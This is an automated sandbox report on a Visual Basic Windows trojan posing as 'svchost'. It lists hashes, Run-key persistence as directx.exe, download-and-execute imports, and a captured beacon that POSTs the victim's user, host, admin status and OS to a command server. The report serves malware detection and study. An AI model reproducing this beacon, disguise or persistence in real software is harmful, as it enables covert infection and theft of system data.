Analysis Date2014-10-02 01:54:37
MD50b91fb5e72640c855097992ebce97b93
SHA16389246634889c316ce78d5b1ab904bba045746b

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 3dd6cda1e9a37910669a8ebb912ac360 sha1: 185ba9d4f83021de641ea2aad0c1c17b116bd168 size: 24576
Section.data md5: 620f0b67a91f7f74151bc5be745b7110 sha1: 1ceaf73df40e531df3bfb26b4fb7cd95fb7bff1d size: 4096
Section.rsrc md5: 0675211fa4b821e68dc6c6027df1aae7 sha1: 972ebf5ad81617b7a4bf3385bf6d8200555b479f size: 4096
Timestamp2011-09-15 14:11:18
VersionInternalName: make
FileVersion: 1.00
CompanyName: Microsoft
ProductName: svchost
ProductVersion: 1.00
OriginalFilename: make.exe
PackerMicrosoft Visual Basic v5.0
PEhashd70f3df33f7cfc1b8e0673e178e3c99630b67639
IMPhash66f019a26687f34e574e51b9b06e5e00

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\directx ➝
C:\Documents and Settings\Administrator\Application Data\directx.exe
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Application Data\directx.exe
Creates MutexLOLEXE
Winsock DNSpetke.pl

Network Details:

DNSpetke.pl
Type: A
87.98.239.19
HTTP POSThttp://petke.pl/own/run.php
User-Agent: 753cda8b05e32ef3b82e0ff947a4a936
Flows TCP192.168.1.1:1031 ➝ 87.98.239.19:80

Raw Pcap
0x00000000 (00000)   504f5354 202f6f77 6e2f7275 6e2e7068   POST /own/run.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 55736572   p HTTP/1.1..User
0x00000020 (00032)   2d416765 6e743a20 37353363 64613862   -Agent: 753cda8b
0x00000030 (00048)   30356533 32656633 62383265 30666639   05e32ef3b82e0ff9
0x00000040 (00064)   34376134 61393336 0d0a436f 6e74656e   47a4a936..Conten
0x00000050 (00080)   742d5479 70653a20 6170706c 69636174   t-Type: applicat
0x00000060 (00096)   696f6e2f 782d7777 772d666f 726d2d75   ion/x-www-form-u
0x00000070 (00112)   726c656e 636f6465 640d0a41 63636570   rlencoded..Accep
0x00000080 (00128)   742d4c61 6e677561 67653a20 656e2d75   t-Language: en-u
0x00000090 (00144)   730d0a43 6f6e7465 6e742d4c 656e6774   s..Content-Lengt
0x000000a0 (00160)   683a2037 340d0a41 63636570 743a202a   h: 74..Accept: *
0x000000b0 (00176)   2f2a0d0a 486f7374 3a207065 746b652e   /*..Host: petke.
0x000000c0 (00192)   706c0d0a 436f6e6e 65637469 6f6e3a20   pl..Connection: 
0x000000d0 (00208)   4b656570 2d416c69 76650d0a 0d0a7573   Keep-Alive....us
0x000000e0 (00224)   6572616e 6470633d 41646d69 6e697374   erandpc=Administ
0x000000f0 (00240)   7261746f 7240434f 4d505554 45522d58   rator@COMPUTER-X
0x00000100 (00256)   58585858 58266164 6d696e3d 54727565   XXXXX&admin=True
0x00000110 (00272)   266f733d 4d696372 6f736f66 74205769   &os=Microsoft Wi
0x00000120 (00288)   6e646f77 73205850                     ndows XP


Strings
040904B0
1.00
753cda8b05e32ef3b82e0ff947a4a936
@*\AC:\Documents and Settings\ADMIN\Pulpit\uBot Sauce\Hidden\Project1.vbp
&admin=
AppData
application/x-www-form-urlencoded
CompanyName
COMPUTERNAME
Content-Type
directx
\directx.exe
.exe
FileVersion
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName
http://
http://petke.pl/own/
&id=
InternalName
\Internet Explorer\iexplore.exe 
LOLEXE
make
make.exe
Microsoft
MSXML2.ServerXMLHTTP
Open
OriginalFilename
&os=
POST
ProductName
ProductVersion
programfiles
RegDelete
regread
ResponseText
run.php
Send
setRequestHeader
Software\Microsoft\Windows\CurrentVersion\Run
StringFileInfo
svchost
TEMP
Translation
Unknown
User-Agent
userandpc=
USERNAME
VarFileInfo
Vista
VS_VERSION_INFO
WScript.Shell
_adj_fdiv_m16i
_adj_fdiv_m32
_adj_fdiv_m32i
_adj_fdiv_m64
_adj_fdiv_r
_adj_fdivr_m16i
_adj_fdivr_m32
_adj_fdivr_m32i
_adj_fdivr_m64
_adj_fpatan
_adj_fprem
_adj_fprem1
_adj_fptan
advapi32.dll
advpack.dll
_allmul
-C000-svc
_CIatan
_CIcos
_CIexp
_CIlog
_CIsin
_CIsqrt
_CItan
C:\Program Files\Microsoft Visual Studio 2\VB98\VB6.OLB
CreateMutexA
`.data
DllFunctionCall
EVENT_SINK_AddRef
EVENT_SINK_QueryInterface
EVENT_SINK_Release
getCommand
GetModuleFileNameA
Gs$FIs
HstLIs|sJs
Is0jIs
IsbrKs
IsNTAdmin
jKs1hKs
jLhl)@
Js&HIs
JstjIs-
} jXh0
kernel32
Ks*aJs
KsEjIsZ]Hs
MSVBVM60.DLL
NTDLL.DLL
NtSetInformationProcess
RegCloseKey
RegCreateKeyA
RegSetValueExA
RtlAdjustPrivilege
SetFileAttributesA
shell32.dll
ShellExecuteA
svchost
!This program cannot be run in DOS mode.
Timer1
URLDownloadToFileA
urlmon
VBA6.DLL
__vbaBoolVarNull
__vbaChkstk
__vbaEnd
__vbaExceptHandler
__vbaExitProc
__vbaFPException
__vbaFreeObj
__vbaFreeObjList
__vbaFreeStr
__vbaFreeStrList
__vbaFreeVar
__vbaFreeVarList
__vbaHresultCheckObj
__vbaI2I4
__vbaI4Var
__vbaInStrVar
__vbaLateMemCall
__vbaLateMemCallLd
__vbaLenBstr
__vbaNew2
__vbaObjSet
__vbaObjSetAddref
__vbaObjVar
__vbaOnError
__vbaR8IntI2
__vbaResume
__vbaSetSystemError
__vbaStrCat
__vbaStrCmp
__vbaStrCopy
__vbaStrI2
__vbaStrMove
__vbaStrToAnsi
__vbaStrToUnicode
__vbaStrVarMove
__vbaStrVarVal
__vbaVarAdd
__vbaVarAnd
__vbaVarCat
__vbaVarCmpGt
__vbaVarCopy
__vbaVarDup
__vbaVarIndexLoad
__vbaVarLateMemCallLd
__vbaVarMove
__vbaVarNot
__vbaVarSetVar
__vbaVarTstEq